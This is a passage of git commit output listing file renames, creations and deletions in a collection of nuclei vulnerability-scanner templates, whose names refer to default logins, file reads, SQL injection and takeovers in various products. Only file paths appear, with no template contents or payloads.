nuclei-templates/Other/{default-django-page.yaml => default-django-page-6842.yaml} (100%) rename nuclei-templates/Other/{default-fastcgi-page.yaml => default-fastcgi-page-6845.yaml} (100%) create mode 100644 nuclei-templates/Other/default-fedora-page-6848.yaml delete mode 100644 nuclei-templates/Other/default-fedora-page-6850.yaml create mode 100644 nuclei-templates/Other/default-glassfish-server-page-6854.yaml delete mode 100644 nuclei-templates/Other/default-glassfish-server-page.yaml create mode 100644 nuclei-templates/Other/default-ibm-http-server-6857.yaml create mode 100644 nuclei-templates/Other/default-jetty-page-6863.yaml delete mode 100644 nuclei-templates/Other/default-jetty-page.yaml delete mode 100644 nuclei-templates/Other/default-lighttpd-page.yaml rename nuclei-templates/Other/{default-microsoft-azure-page.yaml => default-microsoft-azure-page-6873.yaml} (100%) create mode 100644 nuclei-templates/Other/default-openresty-6884.yaml delete mode 100644 nuclei-templates/Other/default-openresty.yaml rename nuclei-templates/Other/{default-payara-server-page.yaml => default-payara-server-page-6895.yaml} (100%) create mode 100644 nuclei-templates/Other/default-plesk-page-6900.yaml delete mode 100644 nuclei-templates/Other/default-plesk-page.yaml create mode 100644 nuclei-templates/Other/default-tomcat-page-6911.yaml create mode 100644 nuclei-templates/Other/default-windows-server-page-6912.yaml delete mode 100644 nuclei-templates/Other/default-windows-server-page-6914.yaml create mode 100644 nuclei-templates/Other/delicate.yaml create mode 100644 nuclei-templates/Other/dell-emc-ecom-default-credentials.yaml delete mode 100644 nuclei-templates/Other/dell-idrac-default-login-6946.yaml create mode 100644 nuclei-templates/Other/dell-idrac-default-login.yaml delete mode 100644 nuclei-templates/Other/dell-idrac6-detect-6918.yaml create mode 100644 nuclei-templates/Other/dell-idrac6-detect-6919.yaml create mode 100644 
nuclei-templates/Other/dell-idrac7-detect-6923.yaml delete mode 100644 nuclei-templates/Other/dell-idrac7-detect.yaml create mode 100644 nuclei-templates/Other/dell-idrac9-default-login-6933.yaml delete mode 100644 nuclei-templates/Other/dell-idrac9-default-login.yaml create mode 100644 nuclei-templates/Other/dell-idrac9-detect-6938.yaml delete mode 100644 nuclei-templates/Other/dell-idrac9-detect-6939.yaml create mode 100644 nuclei-templates/Other/dell-openmanager-login-6948.yaml delete mode 100644 nuclei-templates/Other/dell-openmanager-login.yaml rename nuclei-templates/Other/{dell-wyse-login-6952.yaml => dell-wyse-management-suite-login.yaml} (100%) delete mode 100644 nuclei-templates/Other/deprecated-tls-6958.yaml create mode 100644 nuclei-templates/Other/deprecated-tls.yaml delete mode 100644 nuclei-templates/Other/dericam-login-6962.yaml create mode 100644 nuclei-templates/Other/dericam-login.yaml rename nuclei-templates/Other/{detect-addpac-voip-gateway.yaml => detect-addpac-voip-gateway-6965.yaml} (100%) delete mode 100644 nuclei-templates/Other/detect-all-takeover.yaml delete mode 100644 nuclei-templates/Other/detect-dangling-cname-6966.yaml create mode 100644 nuclei-templates/Other/detect-dangling-cname.yaml rename nuclei-templates/Other/{detect-dns-over-https.yaml => detect-dns-over-https-6970.yaml} (100%) rename nuclei-templates/Other/{detect-options-method.yaml => detect-options-method-6976.yaml} (100%) delete mode 100644 nuclei-templates/Other/detect-rsyncd-6979.yaml create mode 100644 nuclei-templates/Other/detect-rsyncd-6981.yaml delete mode 100644 nuclei-templates/Other/detection-elasticsearch.yaml delete mode 100644 nuclei-templates/Other/detection-zookeeper.yaml rename nuclei-templates/Other/{development-logs.yaml => development-logs-6987.yaml} (100%) rename nuclei-templates/Other/{diaowen-fileread(1).yaml => diaowen-fileread.yaml} (100%) create mode 100644 nuclei-templates/Other/diarise-theme-lfi-6992.yaml delete mode 100644 
nuclei-templates/Other/diarise-theme-lfi.yaml create mode 100644 nuclei-templates/Other/dicoogle-pacs-lfi-6993.yaml delete mode 100644 nuclei-templates/Other/dicoogle-pacs-lfi-6995.yaml rename nuclei-templates/Other/{Digital-Signage-rce.yaml => digital-signage-rce.yaml} (100%) create mode 100644 nuclei-templates/Other/dir-845l.yaml delete mode 100644 nuclei-templates/Other/dir-850l-login-panel.yaml create mode 100644 nuclei-templates/Other/dir-listing-7006.yaml delete mode 100644 nuclei-templates/Other/dir-listing.yaml rename nuclei-templates/Other/{directadmin-login-panel.yaml => directadmin-login-panel-7000.yaml} (100%) rename nuclei-templates/Other/{ZhongkeWangwei-fileRead.yaml => discuz-config-global.yaml} (100%) rename nuclei-templates/Other/{dixell-xweb500-filewrite.yaml => dixell-xweb500-filewrite-7019.yaml} (100%) delete mode 100644 nuclei-templates/Other/django-admin-panel-7021.yaml create mode 100644 nuclei-templates/Other/django-admin-panel-7023.yaml rename nuclei-templates/Other/{django-debug-detect.yaml => django-debug-detect-7024.yaml} (100%) rename nuclei-templates/Other/{django-debug-exposure.yaml => django-debug-exposure-7029.yaml} (100%) rename nuclei-templates/Other/{django-framework-exceptions-7033.yaml => django-framework-exceptions-7034.yaml} (100%) delete mode 100644 nuclei-templates/Other/django-secret-key.yaml create mode 100644 nuclei-templates/Other/django-secret.key.yaml rename nuclei-templates/Other/{dlink-850l-info-leak-7035.yaml => dlink-850l-info-leak-7038.yaml} (100%) create mode 100644 nuclei-templates/Other/dns-320l.yaml create mode 100644 nuclei-templates/Other/docker-compose-config-7057.yaml delete mode 100644 nuclei-templates/Other/docker-compose-config.yaml create mode 100644 nuclei-templates/Other/docker-registry-7064.yaml delete mode 100644 nuclei-templates/Other/docker-registry-7067.yaml rename nuclei-templates/Other/{dolibarr-detect-7069.yaml => dolibarr-detect-7071.yaml} (100%) create mode 100644 
nuclei-templates/Other/dolphinscheduler-default-login-7072.yaml delete mode 100644 nuclei-templates/Other/dolphinscheduler-default-login.yaml delete mode 100644 nuclei-templates/Other/dom-invaider.yaml create mode 100644 nuclei-templates/Other/dom-xss-7080.yaml create mode 100644 nuclei-templates/Other/dos.yaml create mode 100644 nuclei-templates/Other/dotclear-detect.yaml rename nuclei-templates/Other/{dotcms-admin-panel-7085.yaml => dotcms-admin-panel-7087.yaml} (100%) delete mode 100644 nuclei-templates/Other/dotnetcms-sqli-7089.yaml create mode 100644 nuclei-templates/Other/dotnetcms-sqli.yaml create mode 100644 nuclei-templates/Other/druid-detect.yaml rename nuclei-templates/Other/{druid-monitor-7103.yaml => druid-monitor-7100.yaml} (100%) rename nuclei-templates/Other/{drupal-install.yaml => drupal-install-7106.yaml} (100%) rename nuclei-templates/Other/{drupal-user-enum-redirect-7114.yaml => drupal-user-enum-redirect-7115.yaml} (100%) rename nuclei-templates/Other/{signatures-10262.yaml => drupal.yaml} (100%) delete mode 100644 nuclei-templates/Other/dubbo-admin-default-login-7120.yaml create mode 100644 nuclei-templates/Other/dubbo-admin-default-login.yaml rename nuclei-templates/Other/{dvwa-default-login.yaml => dvwa-default-login-7128.yaml} (100%) create mode 100644 nuclei-templates/Other/dvwa-headless-automatic-login-7131.yaml delete mode 100644 nuclei-templates/Other/dvwa-headless-automatic-login.yaml create mode 100644 nuclei-templates/Other/dwr-921-login-panel.yaml create mode 100644 nuclei-templates/Other/dwr-index-detect-7135.yaml delete mode 100644 nuclei-templates/Other/dwr-index-detect.yaml rename nuclei-templates/Other/{dwsync-exposure.yaml => dwsync-exposure-7138.yaml} (100%) rename nuclei-templates/Other/{dynamic-broadcast-receiver.yaml => dynamic-broadcast-receiver-7142.yaml} (100%) rename nuclei-templates/Other/{dynamicweb-panel.yaml => dynamicweb-panel-7144.yaml} (100%) delete mode 100644 nuclei-templates/Other/dynatrace-token.yaml create 
mode 100644 nuclei-templates/Other/dzs-zoomsounds-listing-7148.yaml delete mode 100644 nuclei-templates/Other/dzs-zoomsounds-listing.yaml create mode 100644 nuclei-templates/Other/dzzoffice.yaml create mode 100644 nuclei-templates/Other/e-cology.yaml rename nuclei-templates/Other/{E-message-database.yaml => e-message-database.yaml} (100%) create mode 100644 nuclei-templates/Other/easy-media-gallery-pro-listing-7150.yaml delete mode 100644 nuclei-templates/Other/easy-media-gallery-pro-listing.yaml create mode 100644 nuclei-templates/Other/easy-wp-smtp-listing-7156.yaml delete mode 100644 nuclei-templates/Other/easy-wp-smtp-listing.yaml create mode 100644 nuclei-templates/Other/ec2-detection-7162.yaml delete mode 100644 nuclei-templates/Other/ec2-detection.yaml delete mode 100644 nuclei-templates/Other/ecoa-building-automation-lfd-7165.yaml create mode 100644 nuclei-templates/Other/ecoa-building-automation-lfd.yaml delete mode 100644 nuclei-templates/Other/ecology-arbitrary-file-upload-7169.yaml create mode 100644 nuclei-templates/Other/ecology-arbitrary-file-upload.yaml create mode 100644 nuclei-templates/Other/ecology-filedownload-directory-traversal-7172.yaml delete mode 100644 nuclei-templates/Other/ecology-filedownload-directory-traversal.yaml rename nuclei-templates/Other/{ecology-oa-filedownloadforoutdoc-sqli.yaml => ecology-oa-FileDownloadForOutDoc-sqli.yaml} (100%) create mode 100644 nuclei-templates/Other/ecology-springframework-directory-traversal-7175.yaml delete mode 100644 nuclei-templates/Other/ecology-springframework-directory-traversal.yaml delete mode 100644 nuclei-templates/Other/ecology-v8-sqli-7179.yaml create mode 100644 nuclei-templates/Other/ecology-v8-sqli.yaml rename nuclei-templates/Other/{eg-manager-detect-7183.yaml => eg-manager-detect-7184.yaml} (100%) create mode 100644 nuclei-templates/Other/eibiz-lfi-7186.yaml delete mode 100644 nuclei-templates/Other/eibiz-lfi.yaml delete mode 100644 
nuclei-templates/Other/elasticsearch-sql-client-detect-7190.yaml create mode 100644 nuclei-templates/Other/elasticsearch-sql-client-detect.yaml create mode 100644 nuclei-templates/Other/elasticsearch.yaml rename nuclei-templates/Other/{electron-version-detect.yaml => electron-version-detect-7198.yaml} (100%) rename nuclei-templates/Other/{elfinder-detect.yaml => elfinder-detect-7202.yaml} (100%) rename nuclei-templates/Other/{elfinder-path-traversal.yaml => elfinder-path-traversal(1).yaml} (100%) delete mode 100644 nuclei-templates/Other/elfinder-version-7205.yaml create mode 100644 nuclei-templates/Other/elfinder-version.yaml create mode 100644 nuclei-templates/Other/elfinder.yaml delete mode 100644 nuclei-templates/Other/elmah-log-file-7207.yaml create mode 100644 nuclei-templates/Other/elmah-log-file.yaml create mode 100644 nuclei-templates/Other/email-extraction-7210.yaml delete mode 100644 nuclei-templates/Other/email-extraction.yaml create mode 100644 nuclei-templates/Other/email-obfuscate-shortcode.yaml delete mode 100644 nuclei-templates/Other/emerson-power-panel-7215.yaml create mode 100644 nuclei-templates/Other/emerson-power-panel.yaml create mode 100644 nuclei-templates/Other/empirecms-xss-7220.yaml delete mode 100644 nuclei-templates/Other/empirecms-xss.yaml create mode 100644 nuclei-templates/Other/emqx-default-login-7222.yaml delete mode 100644 nuclei-templates/Other/emqx-default-login.yaml rename nuclei-templates/Other/{enable-secret-for-password-user-and-.yaml => enable-secret-for-user-and-password.yaml} (100%) create mode 100644 nuclei-templates/Other/endpoint_protection_manager.yaml create mode 100644 nuclei-templates/Other/epmp-login-7231.yaml delete mode 100644 nuclei-templates/Other/epmp-login.yaml create mode 100644 nuclei-templates/Other/epson-web-control-detect-7239.yaml delete mode 100644 nuclei-templates/Other/epson-web-control-detect.yaml create mode 100644 nuclei-templates/Other/error-based.yaml create mode 100644 
nuclei-templates/Other/esmtprc-config-7260.yaml delete mode 100644 nuclei-templates/Other/esmtprc-config.yaml create mode 100644 nuclei-templates/Other/etcd-keys-7261.yaml delete mode 100644 nuclei-templates/Other/etcd-keys-7262.yaml create mode 100644 nuclei-templates/Other/etl3100.yaml create mode 100644 nuclei-templates/Other/etouch-v2-sqli-7268.yaml delete mode 100644 nuclei-templates/Other/etouch-v2-sqli.yaml create mode 100644 nuclei-templates/Other/ewebs-arbitrary-file-reading-7270.yaml delete mode 100644 nuclei-templates/Other/ewebs-arbitrary-file-reading.yaml create mode 100644 nuclei-templates/Other/exacqvision-default-login-7277.yaml delete mode 100644 nuclei-templates/Other/exacqvision-default-login.yaml create mode 100644 nuclei-templates/Other/exit-notifier.yaml create mode 100644 nuclei-templates/Other/experience_manager_cloud_service.yaml create mode 100644 nuclei-templates/Other/exploit-CVE-2022-1388.yaml create mode 100644 nuclei-templates/Other/exposed-alps-spring-7283.yaml delete mode 100644 nuclei-templates/Other/exposed-alps-spring.yaml create mode 100644 nuclei-templates/Other/exposed-bitkeeper-7291.yaml delete mode 100644 nuclei-templates/Other/exposed-bitkeeper.yaml rename nuclei-templates/Other/{exposed-bzr.yaml => exposed-bzr-7295.yaml} (100%) create mode 100644 nuclei-templates/Other/exposed-darcs-7297.yaml delete mode 100644 nuclei-templates/Other/exposed-darcs-7298.yaml delete mode 100644 nuclei-templates/Other/exposed-docker-api-7299.yaml create mode 100644 nuclei-templates/Other/exposed-docker-api.yaml create mode 100644 nuclei-templates/Other/exposed-gitignore-7303.yaml delete mode 100644 nuclei-templates/Other/exposed-gitignore-7304.yaml rename nuclei-templates/Other/{exposed-glances-api-7309.yaml => exposed-glances-api-7308.yaml} (100%) delete mode 100644 nuclei-templates/Other/exposed-jquery-file-upload-7315.yaml create mode 100644 nuclei-templates/Other/exposed-jquery-file-upload.yaml create mode 100644 
nuclei-templates/Other/exposed-kafdrop-7316.yaml delete mode 100644 nuclei-templates/Other/exposed-kafdrop.yaml rename nuclei-templates/Other/{exposed-kibana.yaml => exposed-kibana-7320.yaml} (100%) rename nuclei-templates/Other/{exposed-mysql-initial.yaml => exposed-mysql-initial-7322.yaml} (100%) create mode 100644 nuclei-templates/Other/exposed-nomad-7329.yaml delete mode 100644 nuclei-templates/Other/exposed-nomad.yaml delete mode 100644 nuclei-templates/Other/exposed-pii.yaml delete mode 100644 nuclei-templates/Other/exposed-prometheus-log-7333.yaml create mode 100644 nuclei-templates/Other/exposed-prometheus-log-7334.yaml create mode 100644 nuclei-templates/Other/exposed-redis-7338.yaml delete mode 100644 nuclei-templates/Other/exposed-redis.yaml rename nuclei-templates/Other/{exposed-service-now.yaml => exposed-service-now-7342.yaml} (100%) rename nuclei-templates/Other/{exposed-svn.yaml => exposed-svn-7351.yaml} (100%) rename nuclei-templates/Other/{exposed-vscode.yaml => exposed-vscode-7357.yaml} (100%) create mode 100644 nuclei-templates/Other/exposed-zookeeper-7362.yaml rename nuclei-templates/Other/{extract-urls.yaml => extract-urls-7368.yaml} (100%) rename nuclei-templates/Other/{eyelock-nano-lfd.yaml => eyelock-nano-lfd-7373.yaml} (100%) create mode 100644 nuclei-templates/Other/eyou-email-rce-7382.yaml delete mode 100644 nuclei-templates/Other/eyou-email-rce.yaml delete mode 100644 nuclei-templates/Other/f-secure-policy-manager-7560.yaml create mode 100644 nuclei-templates/Other/f-secure-policy-manager-7564.yaml rename nuclei-templates/Other/{Facebook-client-id.yaml => facebook-client-id-7384.yaml} (100%) rename nuclei-templates/Other/{fanruan-deserialization.yaml => fanruan-channel-deserialization.yaml} (100%) rename nuclei-templates/Other/{fanruanoa-detect.yaml => fanruanoa-detect-7391.yaml} (100%) rename nuclei-templates/Other/{fanruanoa2012-detect.yaml => fanruanoa2012-detect-7388.yaml} (100%) rename 
nuclei-templates/Other/{fanruanoa2012-disclosure.yaml => fanruanoa2012-disclosure-7389.yaml} (100%) create mode 100644 nuclei-templates/Other/fastAPI-1.yaml create mode 100644 nuclei-templates/Other/fastAPI-2.yaml create mode 100644 nuclei-templates/Other/fastAPI-3.yaml create mode 100644 nuclei-templates/Other/fastAPI-4.yaml create mode 100644 nuclei-templates/Other/fastAPI-5.yaml rename nuclei-templates/Other/{fastjson-1-2-24-rce.yaml => fastjson-1-2-24-rce-7400.yaml} (100%) rename nuclei-templates/Other/{fastjson-1-2-41-rce.yaml => fastjson-1-2-41-rce-7404.yaml} (100%) rename nuclei-templates/Other/{fastjson-1-2-42-rce.yaml => fastjson-1-2-42-rce-7408.yaml} (100%) rename nuclei-templates/Other/{fastjson-1-2-43-rce.yaml => fastjson-1-2-43-rce-7411.yaml} (100%) rename nuclei-templates/Other/{fastjson-1-2-47-rce.yaml => fastjson-1-2-47-rce-7415.yaml} (100%) create mode 100644 nuclei-templates/Other/fastjson-1-2-67-rce-7423.yaml delete mode 100644 nuclei-templates/Other/fastjson-1-2-67-rce.yaml rename nuclei-templates/Other/{fastjson-1-2-68-rce.yaml => fastjson-1-2-68-rce-7425.yaml} (100%) create mode 100644 nuclei-templates/Other/fastly-takeover-7429.yaml delete mode 100644 nuclei-templates/Other/fastly-takeover.yaml rename nuclei-templates/Other/{fatpipe-ipvpn-panel-7436.yaml => fatpipe-ipvpn-panel-7435.yaml} (100%) rename nuclei-templates/Other/{feedwordpress-xss.yaml => feedwordpress-xss-7459.yaml} (100%) create mode 100644 nuclei-templates/Other/feifeicms-lfr-7462.yaml delete mode 100644 nuclei-templates/Other/feifeicms-lfr-7465.yaml create mode 100644 nuclei-templates/Other/file-scheme-7467.yaml delete mode 100644 nuclei-templates/Other/file-scheme.yaml create mode 100644 nuclei-templates/Other/filezilla-7471.yaml delete mode 100644 nuclei-templates/Other/filezilla.yaml create mode 100644 nuclei-templates/Other/finereport-path-traversal-7478.yaml delete mode 100644 nuclei-templates/Other/finereport-path-traversal.yaml rename 
nuclei-templates/Other/{fingerprinthub-web-fingerprints.yaml => fingerprinthub-web-fingerprints-7480.yaml} (100%) rename nuclei-templates/Other/{fiorilaunchpad-logon.yaml => fiorilaunchpad-logon-7484.yaml} (100%) rename nuclei-templates/Other/{firebase-config-exposure-7485.yaml => firebase-config-exposure-7486.yaml} (100%) delete mode 100644 nuclei-templates/Other/firebase-database-7489.yaml create mode 100644 nuclei-templates/Other/firebase-database.yaml rename nuclei-templates/Other/{firebase-detect-7493.yaml => firebase-detect-7496.yaml} (100%) create mode 100644 nuclei-templates/Other/firebase-urls-7498.yaml delete mode 100644 nuclei-templates/Other/firebase-urls.yaml delete mode 100644 nuclei-templates/Other/fireware-xtm-user-authentication-7501.yaml create mode 100644 nuclei-templates/Other/fireware-xtm-user-authentication.yaml create mode 100644 nuclei-templates/Other/flexbe-takeover-7506.yaml delete mode 100644 nuclei-templates/Other/flexbe-takeover.yaml create mode 100644 nuclei-templates/Other/flexnet_publisher.yaml create mode 100644 nuclei-templates/Other/flightpath-panel-7507.yaml delete mode 100644 nuclei-templates/Other/flightpath-panel.yaml rename nuclei-templates/Other/{flink-exposure.yaml => flink-exposure-7511.yaml} (100%) create mode 100644 nuclei-templates/Other/flir-default-login-7513.yaml delete mode 100644 nuclei-templates/Other/flir-default-login.yaml delete mode 100644 nuclei-templates/Other/flir-path-traversal-7521.yaml create mode 100644 nuclei-templates/Other/flir-path-traversal-7522.yaml create mode 100644 nuclei-templates/Other/floating-contact.yaml create mode 100644 nuclei-templates/Other/flywheel-takeover.yaml delete mode 100644 nuclei-templates/Other/flywheel_takeover.yaml rename nuclei-templates/Other/{fortimail-panel.yaml => fortimail-panel-7531.yaml} (100%) create mode 100644 nuclei-templates/Other/fortinet-fortigate-panel-7535.yaml delete mode 100644 nuclei-templates/Other/fortinet-fortigate-panel.yaml create mode 100644 
nuclei-templates/Other/fortiportal.yaml create mode 100644 nuclei-templates/Other/fortiweb-panel-7537.yaml delete mode 100644 nuclei-templates/Other/fortiweb-panel.yaml create mode 100644 nuclei-templates/Other/framework.yaml rename nuclei-templates/Other/{2755030215.yaml => freelancer.yaml} (100%) create mode 100644 nuclei-templates/Other/freshdesk-takeover-7540.yaml delete mode 100644 nuclei-templates/Other/freshdesk-takeover.yaml create mode 100644 nuclei-templates/Other/front-page-misconfig-7546.yaml delete mode 100644 nuclei-templates/Other/front-page-misconfig.yaml create mode 100644 nuclei-templates/Other/frontify-takeover-7544.yaml delete mode 100644 nuclei-templates/Other/frontify-takeover.yaml create mode 100644 nuclei-templates/Other/froxlor-detect-7551.yaml delete mode 100644 nuclei-templates/Other/froxlor-detect.yaml create mode 100644 nuclei-templates/Other/froxlor.yaml create mode 100644 nuclei-templates/Other/frp-default-login-7559.yaml delete mode 100644 nuclei-templates/Other/frp-default-login.yaml rename nuclei-templates/Other/{frServer-listDir.yaml => frserver-listdir.yaml} (100%) create mode 100644 nuclei-templates/Other/ftp-default-credentials.yaml delete mode 100644 nuclei-templates/Other/ftp-default-creds.yaml create mode 100644 nuclei-templates/Other/ftp-weak-credentials-7569.yaml delete mode 100644 nuclei-templates/Other/ftp-weak-credentials.yaml create mode 100644 nuclei-templates/Other/ftpconfig-7565.yaml delete mode 100644 nuclei-templates/Other/ftpconfig.yaml create mode 100644 nuclei-templates/Other/fuelcms-default-login-7572.yaml delete mode 100644 nuclei-templates/Other/fuelcms-default-login.yaml create mode 100644 nuclei-templates/Other/fumengyun-sqli.yaml rename nuclei-templates/Other/{xss-fuzz-html-tag-injection.yaml => fuzzing-xss-get-params-html-injection.yaml} (100%) create mode 100644 nuclei-templates/Other/g0.yaml rename nuclei-templates/Other/{ganglia-xml-grid-monitor.yaml => ganglia-xml-grid-monitor-7574.yaml} (100%) 
rename nuclei-templates/Other/{2848712183.yaml => ganglia.yaml} (100%) create mode 100644 nuclei-templates/Other/gemfury-takeover-7578.yaml delete mode 100644 nuclei-templates/Other/gemfury-takeover.yaml delete mode 100644 nuclei-templates/Other/general-tokens-7583.yaml create mode 100644 nuclei-templates/Other/general-tokens.yaml create mode 100644 nuclei-templates/Other/generic-linux-lfi-7589.yaml delete mode 100644 nuclei-templates/Other/generic-rfi.yaml rename nuclei-templates/Other/{generic-windows-lfi.yaml => generic-windows-lfi-7591.yaml} (100%) create mode 100644 nuclei-templates/Other/geovision-geowebserver-lfi-7596.yaml delete mode 100644 nuclei-templates/Other/geovision-geowebserver-lfi.yaml rename nuclei-templates/Other/{gespage-detect-7604.yaml => gespage-detect.yaml} (100%) rename nuclei-templates/Other/{gespage-panel.yaml => gespage-panel-7606.yaml} (100%) create mode 100644 nuclei-templates/Other/getresponse-takeover-7610.yaml delete mode 100644 nuclei-templates/Other/getresponse-takeover.yaml rename nuclei-templates/Other/{getsimple-cms-detect.yaml => getsimple-cms-detect-7614.yaml} (100%) create mode 100644 nuclei-templates/Other/getsimple-cms-detector-7612.yaml rename nuclei-templates/Other/{GetSimple-leakage.yaml => getsimple-leakage.yaml} (100%) create mode 100644 nuclei-templates/Other/ghost-takeover-7620.yaml delete mode 100644 nuclei-templates/Other/ghost-takeover-7622.yaml create mode 100644 nuclei-templates/Other/git-config-7633.yaml create mode 100644 nuclei-templates/Other/git-config-nginxoffbyslash-7632.yaml delete mode 100644 nuclei-templates/Other/git-config-nginxoffbyslash.yaml delete mode 100644 nuclei-templates/Other/git-config.yaml rename nuclei-templates/Other/{git-credentials.yaml => git-credentials-7643.yaml} (100%) delete mode 100644 nuclei-templates/Other/git-credentials-disclosure-7640.yaml create mode 100644 nuclei-templates/Other/git-credentials-disclosure-7641.yaml delete mode 100644 
nuclei-templates/Other/git-mailmap-7710.yaml create mode 100644 nuclei-templates/Other/git-mailmap.yaml create mode 100644 nuclei-templates/Other/gitbook-takeover-7626.yaml delete mode 100644 nuclei-templates/Other/gitbook-takeover.yaml rename nuclei-templates/Other/{github-personal-token.yaml => github-personal-token-7657.yaml} (100%) delete mode 100644 nuclei-templates/Other/github-takeover-7661.yaml create mode 100644 nuclei-templates/Other/github-takeover-7662.yaml delete mode 100644 nuclei-templates/Other/github-workflows-disclosure-7665.yaml create mode 100644 nuclei-templates/Other/github-workflows-disclosure.yaml create mode 100644 nuclei-templates/Other/gitlab-api-user-enum-7668.yaml delete mode 100644 nuclei-templates/Other/gitlab-api-user-enum.yaml delete mode 100644 nuclei-templates/Other/gitlab-detect-7670.yaml create mode 100644 nuclei-templates/Other/gitlab-detect-7672.yaml rename nuclei-templates/Other/{gitlab-public-repos.yaml => gitlab-public-repos-7680.yaml} (100%) delete mode 100644 nuclei-templates/Other/gitlab-public-snippets-7686.yaml create mode 100644 nuclei-templates/Other/gitlab-public-snippets-7688.yaml create mode 100644 nuclei-templates/Other/gitlab-rce-7693.yaml delete mode 100644 nuclei-templates/Other/gitlab-rce.yaml create mode 100644 nuclei-templates/Other/gitlab-uninitialized-password-7695.yaml delete mode 100644 nuclei-templates/Other/gitlab-uninitialized-password.yaml create mode 100644 nuclei-templates/Other/gitlab-user-enum-7700.yaml delete mode 100644 nuclei-templates/Other/gitlab-user-enum.yaml create mode 100644 nuclei-templates/Other/gitlab-user-open-api-7702.yaml delete mode 100644 nuclei-templates/Other/gitlab-weak-login-7705.yaml create mode 100644 nuclei-templates/Other/gitlab-weak-login-7706.yaml rename nuclei-templates/Other/{gitlist-disclosure.yaml => gitlist-disclosure-7709.yaml} (100%) create mode 100644 nuclei-templates/Other/globalprotect-panel-7721.yaml delete mode 100644 
nuclei-templates/Other/globalprotect-panel.yaml create mode 100644 nuclei-templates/Other/glpi-9.3.3-sql-injection.yaml create mode 100644 nuclei-templates/Other/glpi-authentication-7727.yaml delete mode 100644 nuclei-templates/Other/glpi-authentication.yaml rename nuclei-templates/Other/{glpi-directory-listing.yaml => glpi-directory-listing-7734.yaml} (100%) create mode 100644 nuclei-templates/Other/glpi-login-1.yaml create mode 100644 nuclei-templates/Other/glpi-login-2.yaml rename nuclei-templates/Other/{glpi-login.yaml => glpi-login-7736.yaml} (100%) rename nuclei-templates/Other/{glpi-telemetry-disclosure.yaml => glpi-telemetry-disclosure-7738.yaml} (100%) rename nuclei-templates/Other/{GLPIDirectoryListing.yaml => glpidirectorylisting(1).yaml} (100%) create mode 100644 nuclei-templates/Other/gnuboard5.yaml delete mode 100644 nuclei-templates/Other/go-anywhere-client-7743.yaml create mode 100644 nuclei-templates/Other/go-anywhere-client.yaml create mode 100644 nuclei-templates/Other/gocd-cruise-configuration-7748.yaml delete mode 100644 nuclei-templates/Other/gocd-cruise-configuration.yaml create mode 100644 nuclei-templates/Other/gocd-login-7751.yaml delete mode 100644 nuclei-templates/Other/gocd-login-7753.yaml delete mode 100644 nuclei-templates/Other/gogs-install-exposure-7755.yaml create mode 100644 nuclei-templates/Other/gogs-install-exposure.yaml create mode 100644 nuclei-templates/Other/goip-1-lfi-7764.yaml delete mode 100644 nuclei-templates/Other/goip-1-lfi.yaml rename nuclei-templates/Other/{golang-metrics.yaml => golang-metrics-7765.yaml} (100%) rename nuclei-templates/Other/{google-api-key.yaml => google-api-key-7770.yaml} (100%) create mode 100644 nuclei-templates/Other/google-floc-disabled-7784.yaml delete mode 100644 nuclei-templates/Other/google-floc-disabled.yaml create mode 100644 nuclei-templates/Other/google-storage-7788.yaml delete mode 100644 nuclei-templates/Other/google-storage.yaml rename 
nuclei-templates/Other/{googlet-extsearchplaces.yaml => google-textsearchplaces.yaml} (100%) rename nuclei-templates/Other/{gophish-default-login-7793.yaml => gophish-default-login-7792.yaml} (100%) create mode 100644 nuclei-templates/Other/gophish-login-7796.yaml delete mode 100644 nuclei-templates/Other/gophish-login.yaml delete mode 100644 nuclei-templates/Other/gradio-CVE-2024-1183.yaml rename nuclei-templates/Other/{gradle-enterprise-panel.yaml => gradle-enterprise-panel-7799.yaml} (100%) create mode 100644 nuclei-templates/Other/grafana-default-login-7804.yaml delete mode 100644 nuclei-templates/Other/grafana-default-login.yaml delete mode 100644 nuclei-templates/Other/grafana-detect-7807.yaml create mode 100644 nuclei-templates/Other/grafana-detect-7808.yaml create mode 100644 nuclei-templates/Other/grafana-file-read.yaml rename nuclei-templates/Other/{grafana-public-signup-7816.yaml => grafana-public-signup-7814.yaml} (100%) rename nuclei-templates/Other/{grails-database-admin-console-7820.yaml => grails-database-admin-console-7819.yaml} (100%) rename nuclei-templates/Other/{grandstream-device-configuration.yaml => grandstream-device-configuration-7823.yaml} (100%) create mode 100644 nuclei-templates/Other/graphql-alias-batching-7826.yaml delete mode 100644 nuclei-templates/Other/graphql-alias-batching.yaml delete mode 100644 nuclei-templates/Other/graphql-detect-7830.yaml create mode 100644 nuclei-templates/Other/graphql-detect-7831.yaml create mode 100644 nuclei-templates/Other/graphql-get-method-7836.yaml delete mode 100644 nuclei-templates/Other/graphql-get-method.yaml rename nuclei-templates/Other/{grav-cms-detect.yaml => grav-cms-detect-7842.yaml} (100%) create mode 100644 nuclei-templates/Other/graylog-api-browser-7846.yaml delete mode 100644 nuclei-templates/Other/graylog-api-browser.yaml create mode 100644 nuclei-templates/Other/groupoffice-lfi-7851.yaml delete mode 100644 nuclei-templates/Other/groupoffice-lfi.yaml rename 
nuclei-templates/Other/{gruntfile-exposure.yaml => gruntfile-exposure-7852.yaml} (100%) create mode 100644 nuclei-templates/Other/gt-ac2900-login(1).yaml create mode 100644 nuclei-templates/Other/guacamole-default-login-7858.yaml delete mode 100644 nuclei-templates/Other/guacamole-default-login-7861.yaml rename nuclei-templates/Other/{gunicorn-detect.yaml => gunicorn-detect-7863.yaml} (100%) delete mode 100644 nuclei-templates/Other/h2console-panel-7866.yaml create mode 100644 nuclei-templates/Other/h2console-panel.yaml rename nuclei-templates/Other/{h2csmuggle-upgrade-only-nuclei.yaml => h2csmuggle-nuclei.yaml} (100%) rename nuclei-templates/Other/{h3c-imc-rce.yaml => h3c-imc-rce-7870.yaml} (100%) rename nuclei-templates/Other/{H3C-SECPATH-loginBypass.yaml => h3c-secpath-loginbypass.yaml} (100%) rename nuclei-templates/Other/{hadoop-exposure.yaml => hadoop-exposure-7872.yaml} (100%) rename nuclei-templates/Other/{hadoop-unauth.yaml => hadoop-unauth-7875.yaml} (100%) create mode 100644 nuclei-templates/Other/haproxy-status-7883.yaml delete mode 100644 nuclei-templates/Other/haproxy-status.yaml create mode 100644 nuclei-templates/Other/hashicorp-consul-rce-7891.yaml delete mode 100644 nuclei-templates/Other/hashicorp-consul-rce-7894.yaml delete mode 100644 nuclei-templates/Other/hashicorp-consul-webgui-7898.yaml create mode 100644 nuclei-templates/Other/hashicorp-consul-webgui.yaml delete mode 100644 nuclei-templates/Other/hasura-graphql-ssrf-7903.yaml create mode 100644 